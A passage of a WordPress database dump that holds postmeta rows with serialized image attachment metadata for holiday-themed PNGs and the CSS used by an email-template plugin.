padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}'),(5881,415,'_thumbnail_id','411'),(5882,416,'_wp_attached_file','2017/07/thanksgive.png'),(5883,416,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:712;s:6:\"height\";i:494;s:4:\"file\";s:22:\"2017/07/thanksgive.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"thanksgive-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"thanksgive-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"thanksgive-600x416.png\";s:5:\"width\";i:600;s:6:\"height\";i:416;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"thanksgive-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"thanksgive-300x208.png\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"thanksgive-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"thanksgive-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"thanksgive-600x416.png\";s:5:\"width\";i:600;s:6:\"height\";i:416;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:22:\"thanksgive-550x400.png\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:22:\"thanksgive-230x160.png\";s:5:\"width\";i:230;s:6:\"height\";i:160;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:22:\"thanksgive-350x243.png\";s:5:\"width\";i:350;s:6:\"height\";i:243;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:22:\"thanksgive-480x333.png\";s:5:\"width\";i:480;s:6:\"height\";i:333;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5884,417,'_wp_attached_file','2017/07/president-day.png'),(5885,417,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:615;s:6:\"height\";i:749;s:4:\"file\";s:25:\"2017/07/president-day.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"president-day-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"president-day-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"president-day-600x731.png\";s:5:\"width\";i:600;s:6:\"height\";i:731;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"president-day-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"president-day-246x300.png\";s:5:\"width\";i:246;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"president-day-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"president-day-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"president-day-600x731.png\";s:5:\"width\";i:600;s:6:\"height\";i:731;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:25:\"president-day-550x400.png\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:25:\"president-day-230x280.png\";s:5:\"width\";i:230;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:25:\"president-day-350x426.png\";s:5:\"width\";i:350;s:6:\"height\";i:426;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:25:\"president-day-480x585.png\";s:5:\"width\";i:480;s:6:\"height\";i:585;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5886,418,'_wp_attached_file','2017/07/halloween.png'),(5887,418,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:636;s:4:\"file\";s:21:\"2017/07/halloween.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"halloween-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"halloween-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"halloween-600x545.png\";s:5:\"width\";i:600;s:6:\"height\";i:545;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"halloween-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"halloween-300x273.png\";s:5:\"width\";i:300;s:6:\"height\";i:273;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"halloween-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"halloween-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"halloween-600x545.png\";s:5:\"width\";i:600;s:6:\"height\";i:545;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:21:\"halloween-550x400.png\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:21:\"halloween-230x209.png\";s:5:\"width\";i:230;s:6:\"height\";i:209;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:21:\"halloween-350x318.png\";s:5:\"width\";i:350;s:6:\"height\";i:318;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:21:\"halloween-480x436.png\";s:5:\"width\";i:480;s:6:\"height\";i:436;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5888,419,'_wp_attached_file','2017/07/Group-1.png'),(5889,419,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:230;s:6:\"height\";i:350;s:4:\"file\";s:19:\"2017/07/Group-1.png\";s:5:\"sizes\";a:7:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"Group-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"Group-1-200x250.png\";s:5:\"width\";i:200;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:1;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Group-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Group-1-197x300.png\";s:5:\"width\";i:197;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"Group-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"Group-1-200x250.png\";s:5:\"width\";i:200;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:1;}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:19:\"Group-1-230x350.png\";s:5:\"width\";i:230;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5890,420,'_wp_attached_file','2017/07/Shape-4-copy-4.png'),(5891,420,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:487;s:6:\"height\";i:572;s:4:\"file\";s:26:\"2017/07/Shape-4-copy-4.png\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"Shape-4-copy-4-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"Shape-4-copy-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"Shape-4-copy-4-300x352.png\";s:5:\"width\";i:300;s:6:\"height\";i:352;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Shape-4-copy-4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Shape-4-copy-4-255x300.png\";s:5:\"width\";i:255;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Shape-4-copy-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"Shape-4-copy-4-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:26:\"Shape-4-copy-4-487x400.png\";s:5:\"width\";i:487;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:26:\"Shape-4-copy-4-230x270.png\";s:5:\"width\";i:230;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:26:\"Shape-4-copy-4-350x411.png\";s:5:\"width\";i:350;s:6:\"height\";i:411;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:26:\"Shape-4-copy-4-480x564.png\";s:5:\"width\";i:480;s:6:\"height\";i:564;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5892,421,'_wp_attached_file','2017/07/mother.png'),(5893,421,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:466;s:6:\"height\";i:208;s:4:\"file\";s:18:\"2017/07/mother.png\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"mother-300x208.png\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"mother-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"mother-300x134.png\";s:5:\"width\";i:300;s:6:\"height\";i:134;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"mother-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"mother-300x134.png\";s:5:\"width\";i:300;s:6:\"height\";i:134;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"mother-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:18:\"mother-300x208.png\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:18:\"mother-230x103.png\";s:5:\"width\";i:230;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:18:\"mother-350x156.png\";s:5:\"width\";i:350;s:6:\"height\";i:156;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5894,422,'_wp_attached_file','2017/07/christmas.png'),(5895,422,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:543;s:6:\"height\";i:313;s:4:\"file\";s:21:\"2017/07/christmas.png\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"christmas-300x313.png\";s:5:\"width\";i:300;s:6:\"height\";i:313;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"christmas-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"christmas-300x173.png\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"christmas-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"christmas-300x173.png\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"christmas-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"christmas-300x313.png\";s:5:\"width\";i:300;s:6:\"height\";i:313;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:21:\"christmas-230x133.png\";s:5:\"width\";i:230;s:6:\"height\";i:133;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:21:\"christmas-350x202.png\";s:5:\"width\";i:350;s:6:\"height\";i:202;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:21:\"christmas-480x277.png\";s:5:\"width\";i:480;s:6:\"height\";i:277;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5896,423,'_wp_attached_file','2017/07/banner.png'),(5897,423,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:534;s:6:\"height\";i:406;s:4:\"file\";s:18:\"2017/07/banner.png\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"banner-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"banner-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"banner-300x228.png\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"banner-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"banner-300x228.png\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"banner-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:18:\"banner-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:18:\"banner-534x400.png\";s:5:\"width\";i:534;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:18:\"banner-230x175.png\";s:5:\"width\";i:230;s:6:\"height\";i:175;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:18:\"banner-350x266.png\";s:5:\"width\";i:350;s:6:\"height\";i:266;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:18:\"banner-480x365.png\";s:5:\"width\";i:480;s:6:\"height\";i:365;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5898,424,'_wp_attached_file','2017/07/independence.png'),(5899,424,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:645;s:6:\"height\";i:312;s:4:\"file\";s:24:\"2017/07/independence.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"independence-300x312.png\";s:5:\"width\";i:300;s:6:\"height\";i:312;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"independence-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"independence-600x290.png\";s:5:\"width\";i:600;s:6:\"height\";i:290;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"independence-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"independence-300x145.png\";s:5:\"width\";i:300;s:6:\"height\";i:145;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"independence-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:24:\"independence-300x312.png\";s:5:\"width\";i:300;s:6:\"height\";i:312;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"independence-600x290.png\";s:5:\"width\";i:600;s:6:\"height\";i:290;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:24:\"independence-550x312.png\";s:5:\"width\";i:550;s:6:\"height\";i:312;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:24:\"independence-230x111.png\";s:5:\"width\";i:230;s:6:\"height\";i:111;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:24:\"independence-350x169.png\";s:5:\"width\";i:350;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:24:\"independence-480x232.png\";s:5:\"width\";i:480;s:6:\"height\";i:232;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5900,425,'mwb_css_field','html,body{margin: 0 auto !important;padding: 0 !important;height: 100% !important;width: 100% !important;}/* What it does: Stops email clients resizing small text. */*{-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */table,td{mso-table-lspace: 0pt !important;mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */table{border-spacing: 0 !important;border-collapse: collapse !important;table-layout: fixed !important;margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */.mobile-link--footer a,a[x-apple-data-detectors]{color:inherit !important;text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */.button-link{text-decoration: none !important;}.button-td,.button-a{transition: all 100ms ease-in;}.button-td:hover,.button-a:hover{background: #555555 !important;border-color: #555555 !important;}'),(5901,425,'_thumbnail_id','416'),(5902,426,'mwb_css_field','html,body{margin: 0 auto !important;padding: 0 !important;height: 100% !important;width: 100% !important;}/* What it does: Stops email clients resizing small text. */*{-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */table,td{mso-table-lspace: 0pt !important;mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */table{border-spacing: 0 !important;border-collapse: collapse !important;table-layout: fixed !important;margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */.mobile-link--footer a,a[x-apple-data-detectors]{color:inherit !important;text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */.button-link{text-decoration: none !important;}.button-td,.button-a{transition: all 100ms ease-in;}.button-td:hover,.button-a:hover{background: #555555 !important;border-color: #555555 !important;}'),(5903,426,'_thumbnail_id','417'),(5904,427,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ 